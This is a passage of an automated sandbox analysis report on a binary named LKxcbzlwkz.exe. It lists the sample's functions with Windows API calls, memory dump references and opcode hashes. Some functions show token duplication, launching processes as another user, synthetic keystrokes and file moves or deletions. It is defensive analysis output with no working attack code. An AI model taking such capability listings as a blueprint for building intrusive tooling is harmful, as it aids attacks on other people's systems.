                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Startup
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 724789610-0
                                                                                                                                                                                                                                                            • Opcode ID: 7202705a9892f4bd4a2423c339a1cc919efe15e3859c0a303b549491d84c9c0e
                                                                                                                                                                                                                                                            • Instruction ID: 50042109da9cb7071167785bc1ba5dfd020c55d47bb24ccc02d0932d492e023f
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7202705a9892f4bd4a2423c339a1cc919efe15e3859c0a303b549491d84c9c0e
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E0F0A0372043046FD320EE799C56EAB77ECAF85A20F048A2EBDA4C72C5DA75D904C795
                                                                                                                                                                                                                                                            Function 00432017 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: __fread_nolock
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2638373210-0
                                                                                                                                                                                                                                                            • Opcode ID: edb91a60a9196e9afb8971b982a6898244a9e52d7973f3fad70e56183420ffb1
                                                                                                                                                                                                                                                            • Instruction ID: 9e9a42c0c7b58ac35d14f3716b04d6bdbb365f426eb98045716108692e45ddfa
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: edb91a60a9196e9afb8971b982a6898244a9e52d7973f3fad70e56183420ffb1
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 82F01CB16047045FDB35CA24D941BA3B7E89B4A350F00481EFAAA87342D6B6B845CA99
                                                                                                                                                                                                                                                            Function 00436327 Relevance: 1.5, APIs: 1, Instructions: 16windowtimeCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 0043633F
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: MessageSendTimeout
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1599653421-0
                                                                                                                                                                                                                                                            • Opcode ID: 9860d8fd04dca8f4639475c0e949a449d7e9360e0213879cd93aaa3a815527bf
                                                                                                                                                                                                                                                            • Instruction ID: 404f820d5c191ead8adfbb6f72584c17bf9223e8bc32b4a3dee19ec2549da310
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9860d8fd04dca8f4639475c0e949a449d7e9360e0213879cd93aaa3a815527bf
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9BD0C97139030876E7248A659D0BF96375C5710F40F5081257B04A91D0D9A0F5408658
                                                                                                                                                                                                                                                            Function 004149C2 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: __wfsopen
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 197181222-0
                                                                                                                                                                                                                                                            • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                                                                                                                                                                                                                            • Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
                                                                                                                                                                                                                                                            Function 00457655 Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00457691
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FreeVirtual
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1263568516-0
                                                                                                                                                                                                                                                            • Opcode ID: 12355e0c1cd2370de3c66ee78c10e1cdf78f5353f4a7960eda3dfd2e06e77a07
                                                                                                                                                                                                                                                            • Instruction ID: 585986ab59306b88a5763987f2255c0463a5351c33a64af797a68cbfb1d2d2f8
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 12355e0c1cd2370de3c66ee78c10e1cdf78f5353f4a7960eda3dfd2e06e77a07
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D411A931200A009FD314EF29D844F96F7A9FF85320F1081ABE9488B3A1CB75F841CB95

                                                                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                                                                            Function 0047C81C Relevance: 74.2, APIs: 40, Strings: 2, Instructions: 674windowkeyboardCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                                                                                                                                                                                                                                                            • GetKeyState.USER32(00000011), ref: 0047C92D
                                                                                                                                                                                                                                                            • GetKeyState.USER32(00000009), ref: 0047C936
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                                                                                                                                                                                                                                                            • GetKeyState.USER32(00000010), ref: 0047C953
                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                                                                                                                                                                                                                                                            • _wcsncpy.LIBCMT ref: 0047CA29
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                                                                                                                                                                                                                                                            • SendMessageW.USER32 ref: 0047CA7F
                                                                                                                                                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                                                                                                                                                                                                                                                            • ImageList_SetDragCursorImage.COMCTL32(00B26C98,00000000,00000000,00000000), ref: 0047CB9B
                                                                                                                                                                                                                                                            • ImageList_BeginDrag.COMCTL32(00B26C98,00000000,000000F8,000000F0), ref: 0047CBAC
                                                                                                                                                                                                                                                            • SetCapture.USER32(?), ref: 0047CBB6
                                                                                                                                                                                                                                                            • ClientToScreen.USER32(?,?), ref: 0047CC17
                                                                                                                                                                                                                                                            • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                                                                                                                                                                                                                                                            • ReleaseCapture.USER32 ref: 0047CC3A
                                                                                                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 0047CC72
                                                                                                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 0047CC80
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                                                                                                                                                                                                                                                            • SendMessageW.USER32 ref: 0047CD12
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                                                                                                                                                                                                                                                            • SendMessageW.USER32 ref: 0047CD80
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                                                                                                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 0047CDC8
                                                                                                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 0047CDD6
                                                                                                                                                                                                                                                            • GetParent.USER32(00000000), ref: 0047CDF7
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                                                                                                                                                                                                                                                            • SendMessageW.USER32 ref: 0047CE93
                                                                                                                                                                                                                                                            • ClientToScreen.USER32(?,?), ref: 0047CEEE
                                                                                                                                                                                                                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,017D1A90,00000000,?,?,?,?), ref: 0047CF1C
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                                                                                                                                                                                                                                                            • SendMessageW.USER32 ref: 0047CF6B
                                                                                                                                                                                                                                                            • ClientToScreen.USER32(?,?), ref: 0047CFB5
                                                                                                                                                                                                                                                            • TrackPopupMenuEx.USER32(?,00000080,?,?,017D1A90,00000000,?,?,?,?), ref: 0047CFE6
                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                                                                                                                                                                                            • String ID: @GUI_DRAGID$F
                                                                                                                                                                                                                                                            • API String ID: 3100379633-4164748364
                                                                                                                                                                                                                                                            • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                                                                                                                                                                                                            • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                                                                                                                                                                                                                                                            Function 00434418 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 133keyboardthreadwindowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetForegroundWindow.USER32 ref: 00434420
                                                                                                                                                                                                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                                                                                                                                                                                                                                                            • IsIconic.USER32(?), ref: 0043444F
                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000009), ref: 0043445C
                                                                                                                                                                                                                                                            • SetForegroundWindow.USER32(?), ref: 0043446A
                                                                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00434485
                                                                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                                                                                                                                                                                                                                                            • SetForegroundWindow.USER32(00000000), ref: 004344B7
                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                                                                                                                                                                                                                                                            • keybd_event.USER32(00000012,00000000), ref: 004344CF
                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                                                                                                                                                                                                                                                            • keybd_event.USER32(00000012,00000000), ref: 004344E6
                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                                                                                                                                                                                                                                                            • keybd_event.USER32(00000012,00000000), ref: 004344FD
                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                                                                                                                                                                                                                                                            • keybd_event.USER32(00000012,00000000), ref: 00434514
                                                                                                                                                                                                                                                            • SetForegroundWindow.USER32(00000000), ref: 0043451E
                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                                                                                                                                                            • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                            • API String ID: 2889586943-2988720461
                                                                                                                                                                                                                                                            • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                                                                                                                                                                                                            • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                                                                                                                                                                                                                                                            Function 00446313 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 234processCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 004463A0
                                                                                                                                                                                                                                                            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                                                                                                                                                                                                                                                            • GetProcessWindowStation.USER32 ref: 004463D1
                                                                                                                                                                                                                                                            • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                                                                                                                                                                                                                                                            • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00446498
                                                                                                                                                                                                                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                                                            • _wcsncpy.LIBCMT ref: 004464C0
                                                                                                                                                                                                                                                            • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                                                                                                                                                                                                                                                            • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                                                                                                                                                                                                                                                            • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                                                                                                                                                                                                                                                            • UnloadUserProfile.USERENV(?,?), ref: 00446555
                                                                                                                                                                                                                                                            • CloseWindowStation.USER32(00000000), ref: 0044656C
                                                                                                                                                                                                                                                            • CloseDesktop.USER32(?), ref: 0044657A
                                                                                                                                                                                                                                                            • SetProcessWindowStation.USER32(?), ref: 00446588
                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00446592
                                                                                                                                                                                                                                                            • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                                                                                                                                                                                                                                                            • String ID: $@OH$default$winsta0
                                                                                                                                                                                                                                                            • API String ID: 3324942560-3791954436
                                                                                                                                                                                                                                                            • Opcode ID: b6829c8fcb7e7383e42c55797dfa06ace0a07bf9b006e94e96dae5363c822db3
                                                                                                                                                                                                                                                            • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b6829c8fcb7e7383e42c55797dfa06ace0a07bf9b006e94e96dae5363c822db3
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                                                                                                                                                                                                                                                            Function 0044BD27 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 178filestringCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\LKxcbzlwkz.exe,0040F545,C:\Users\user\Desktop\LKxcbzlwkz.exe,004A90E8,C:\Users\user\Desktop\LKxcbzlwkz.exe,?,0040F545), ref: 0041013C
                                                                                                                                                                                                                                                              • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 0043392E
                                                                                                                                                                                                                                                              • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 00433950
                                                                                                                                                                                                                                                              • Part of subcall function 00433908: __wcsicoll.LIBCMT ref: 00433974
                                                                                                                                                                                                                                                              • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                                                                                                                                                                                            • _wcscat.LIBCMT ref: 0044BD94
                                                                                                                                                                                                                                                            • _wcscat.LIBCMT ref: 0044BDBD
                                                                                                                                                                                                                                                            • __wsplitpath.LIBCMT ref: 0044BDEA
                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0044BE02
                                                                                                                                                                                                                                                            • _wcscpy.LIBCMT ref: 0044BE71
                                                                                                                                                                                                                                                            • _wcscat.LIBCMT ref: 0044BE83
                                                                                                                                                                                                                                                            • _wcscat.LIBCMT ref: 0044BE95
                                                                                                                                                                                                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC1
                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?), ref: 0044BED3
                                                                                                                                                                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 0044BEF3
                                                                                                                                                                                                                                                            • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0A
                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?), ref: 0044BF15
                                                                                                                                                                                                                                                            • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2C
                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 0044BF33
                                                                                                                                                                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 0044BF4F
                                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF64
                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 0044BF7C
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
